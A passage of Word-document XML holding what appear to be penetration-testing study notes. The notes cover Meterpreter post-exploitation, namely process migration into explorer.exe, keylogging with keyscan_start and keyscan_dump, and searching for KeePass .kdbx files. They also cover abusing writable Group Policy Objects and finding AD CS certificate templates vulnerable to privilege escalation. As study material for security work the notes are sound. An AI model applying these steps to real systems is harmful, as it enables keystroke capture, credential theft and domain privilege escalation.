        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the Windows desktop shell—this confirms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>that the</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> user is logged in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> in system so we can migrate to user by migrate this process</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1D5518" w14:textId="6BECEB01" w:rsidR="000C3A2B" w:rsidRDefault="000C3A2B" w:rsidP="000C3A2B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We Get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Process ID of explorer process</w:t>
      </w:r>
      <w:r w:rsidR="00C7701A">
        <w:t xml:space="preserve"> and know it’s user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B2DC3" w14:textId="77777777" w:rsidR="00A936F6" w:rsidRDefault="00C7701A" w:rsidP="00A936F6">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="027172DB" w14:textId="42E1BB3D" w:rsidR="00C7701A" w:rsidRDefault="00A936F6" w:rsidP="00A936F6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A936F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Migrate to login user explorer process by explorer process ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE80C51" w14:textId="37D9F23B" w:rsidR="00A936F6" w:rsidRDefault="00A936F6" w:rsidP="00A936F6">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00A936F6">
        <w:t>meterpreter\&gt;migrate 3612</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E79F73" w14:textId="6630E62F" w:rsidR="00DD594C" w:rsidRPr="00E85D45" w:rsidRDefault="00DD594C" w:rsidP="00DD594C">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="af-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD594C">
        <w:t>migrate is used in Meterpreter to move your Meterpreter session to a more stable or privileged process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C3548" w14:textId="03FB9933" w:rsidR="00C7701A" w:rsidRPr="00DD594C" w:rsidRDefault="00230C99" w:rsidP="00DD594C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD594C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Check that we now </w:t>
      </w:r>
      <w:r w:rsidR="00DD594C" w:rsidRPr="00DD594C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD594C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the logged </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD594C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73087F0C" w14:textId="03A9ACA8" w:rsidR="00230C99" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00230C99">
        <w:t>meterpreter\&gt;getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B55CC" w14:textId="50831165" w:rsidR="00B429F0" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start our keylogger Attack for this user</w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9FEDD" w14:textId="619850F9" w:rsidR="00230C99" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00230C99">
        <w:t>meterpreter\&gt;keyscan_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7550A" w14:textId="529A7604" w:rsidR="00230C99" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">After while of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump captured keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092BEA3F" w14:textId="76FF0699" w:rsidR="00230C99" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00230C99">
        <w:t>meterpreter\&gt;keyscan_dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8C71D" w14:textId="1AD13F80" w:rsidR="00230C99" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">We may dump credentials in </w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">KeePass </w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:t xml:space="preserve">that is a popular password manager that stores usernames, passwords, and other credentials in an encrypted database file, typically with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230C99">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.kdbx</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BBC93E2" w14:textId="1C822370" w:rsidR="00230C99" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00230C99">
        <w:t>meterpreter&gt; search -f *.kdbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF697E" w14:textId="1723994B" w:rsidR="00B429F0" w:rsidRDefault="00230C99" w:rsidP="00230C99">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00230C99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keepassx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: program to open </w:t>
      </w:r>
      <w:r w:rsidRPr="00230C99">
        <w:t>kdbx credential database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5111C511" w14:textId="77777777" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="004126A1"/>
    <w:p w14:paraId="7839D11D" w14:textId="7AA2C102" w:rsidR="00B429F0" w:rsidRPr="007C0596" w:rsidRDefault="007C0596" w:rsidP="007C0596">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0596">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting GPOs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E185CA9" w14:textId="47B15317" w:rsidR="00B429F0" w:rsidRDefault="003C2CC6" w:rsidP="003C2CC6">
      <w:r w:rsidRPr="003C2CC6">
        <w:t xml:space="preserve">GPM </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:t>Group Policy Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:t>allows us to define policies directly on the AD structure. Essentially, we can define GPO</w:t>
      </w:r>
      <w:r w:rsidR="009E08B8">
        <w:t xml:space="preserve"> (Group Policy Objects</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009E08B8">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C2CC6">
        <w:t xml:space="preserve"> for AD objects, such as a specific OU or group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF4246" w14:textId="69677C08" w:rsidR="00B429F0" w:rsidRDefault="003C2CC6" w:rsidP="003C2CC6">
      <w:r w:rsidRPr="003C2CC6">
        <w:t>Domain-joined computers would then pull all policies from SYSVOL periodically and apply the relevant ones.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">By default, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:t xml:space="preserve">policies are replicated every 15 minutes through the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>gpupdate</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2CC6">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F4CD7B" w14:textId="73D331F1" w:rsidR="003C2CC6" w:rsidRDefault="009E08B8" w:rsidP="009E08B8">
      <w:r w:rsidRPr="009E08B8">
        <w:t xml:space="preserve">To modify the GPO, we need to access Group Policy Management as the AD user that has the relevant permissions. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E08B8">
        <w:t>open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E08B8">
        <w:t xml:space="preserve"> MMC to modify the GPO. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF6D39" w14:textId="70F30AD5" w:rsidR="00B429F0" w:rsidRDefault="009E08B8" w:rsidP="004126A1">
      <w:r>
        <w:t>The Idea is to access GPM and modify GPO that we have write access on it to enable us to make some actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F52F5" w14:textId="77777777" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="004126A1"/>
    <w:p w14:paraId="2578C04E" w14:textId="77777777" w:rsidR="000E0843" w:rsidRDefault="000E0843" w:rsidP="004126A1"/>
    <w:p w14:paraId="2ABB8B4F" w14:textId="65E28456" w:rsidR="00B429F0" w:rsidRPr="000E0843" w:rsidRDefault="000E0843" w:rsidP="000E0843">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0843">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEB362" w14:textId="4E38146F" w:rsidR="00F42D9E" w:rsidRPr="00F42D9E" w:rsidRDefault="00F42D9E" w:rsidP="00F42D9E">
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD Certificate Services (CS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:t xml:space="preserve"> is Microsoft's Public Key Infrastructure (PKI) implementation. AD used as a CA to prove and delegate trust. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD CS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:t xml:space="preserve"> is used for several things, such as encrypting file systems, creating and verifying digital signatures, and user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550193D7" w14:textId="73AAAF05" w:rsidR="00B429F0" w:rsidRDefault="00F42D9E" w:rsidP="00F42D9E">
      <w:r w:rsidRPr="00F42D9E">
        <w:t>AD CS is a privileged function, it usually runs on selected domain controllers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but can’t done manually so admins on AD CS can’t make certificates manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67486754" w14:textId="76093BCA" w:rsidR="00F42D9E" w:rsidRDefault="00F42D9E" w:rsidP="00F42D9E">
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators of AD CS can create several </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>templates</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:t xml:space="preserve"> that can allow any user with the relevant permissions to request a certificate themselves</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF376A" w14:textId="79D268E8" w:rsidR="00B429F0" w:rsidRDefault="00F42D9E" w:rsidP="00F42D9E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>emplates</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:t xml:space="preserve"> have parameters that say which user can request the certificate and what is required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27034901" w14:textId="1A3238F2" w:rsidR="00F42D9E" w:rsidRPr="00F42D9E" w:rsidRDefault="00F42D9E" w:rsidP="00D41030">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Combinations of these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Template</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters can be incredibly toxic</w:t>
      </w:r>
      <w:r w:rsidR="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>allowing the requester to perform privilege escalation</w:t>
      </w:r>
      <w:r w:rsidR="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AA8B3" w14:textId="77777777" w:rsidR="00C23A48" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>PKI - Public Key Infrastructure is a system that manages certificates and public key encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6A92D" w14:textId="77777777" w:rsidR="00C23A48" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>AD CS - Active Directory Certificate Services is Microsoft's PKI implementation which usually runs on domain controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C50E7F" w14:textId="77777777" w:rsidR="00C23A48" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>CA - Certificate Authority is a PKI that issues certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9EE3B" w14:textId="77777777" w:rsidR="00C23A48" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>Certificate Template - a collection of settings and policies that defines how and when a certificate may be issued by a CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC5544E" w14:textId="77777777" w:rsidR="00C23A48" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>CSR - Certificate Signing Request is a message sent to a CA to request a signed certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40400C61" w14:textId="77777777" w:rsidR="00C23A48" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>EKU - Extended/Enhanced Key Usage are object identifiers that define how a generated certificate may be used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674EDF2" w14:textId="77777777" w:rsidR="000E0843" w:rsidRDefault="000E0843" w:rsidP="004126A1"/>
    <w:p w14:paraId="1C980CFD" w14:textId="6C70FD9A" w:rsidR="000E0843" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Finding Vulnerable Certificate Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A24A46" w14:textId="66D414DC" w:rsidR="000E0843" w:rsidRPr="00C23A48" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">using Window's built-in tool </w:t>
      </w:r>
      <w:r w:rsidRPr="00C23A48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FD8EB" w14:textId="63F6BADA" w:rsidR="00B429F0" w:rsidRDefault="00C23A48" w:rsidP="00C23A48">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C23A48">
        <w:t>enumerate certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FAC828" w14:textId="1FC3A025" w:rsidR="00B429F0" w:rsidRDefault="00C23A48" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>C:\&gt;certutil -Template -v &gt; templates.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C63E6D" w14:textId="3C0AAA62" w:rsidR="00B9025E" w:rsidRDefault="00C23A48" w:rsidP="00D41030">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:t xml:space="preserve">We could also use a certificate auditing tool such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:t>Ghostpack's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:instrText>HYPERLINK "https://github.com/GhostPack/PSPKIAudit" \t "_blank"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>PSPKIAudit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D41030" w:rsidRPr="00D41030">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A57AD44" w14:textId="5B44F435" w:rsidR="00B9025E" w:rsidRDefault="00D41030" w:rsidP="00D41030">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Example for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41030">
        <w:t>poisonous parameter combination</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04773AA3" w14:textId="2167CEF8" w:rsidR="00D41030" w:rsidRPr="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> - The certificate can be used for Client Authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D113769" w14:textId="77777777" w:rsidR="00D41030" w:rsidRPr="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- The certificate template allows us to specify the Subject Alternative Name (SAN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488799D3" w14:textId="77777777" w:rsidR="00D41030" w:rsidRPr="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CTPRIVATEKEY_FLAG_EXPORTABLE_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> - The certificate will be exportable with the private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15251609" w14:textId="77777777" w:rsidR="00D41030" w:rsidRPr="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Certificate Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - We have the required </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D41030">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use the certificate template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD2CE2" w14:textId="77777777" w:rsidR="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B2055A" w14:textId="77777777" w:rsidR="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030"/>
    <w:p w14:paraId="412FF87D" w14:textId="77777777" w:rsidR="00D41030" w:rsidRDefault="00D41030" w:rsidP="00D41030"/>
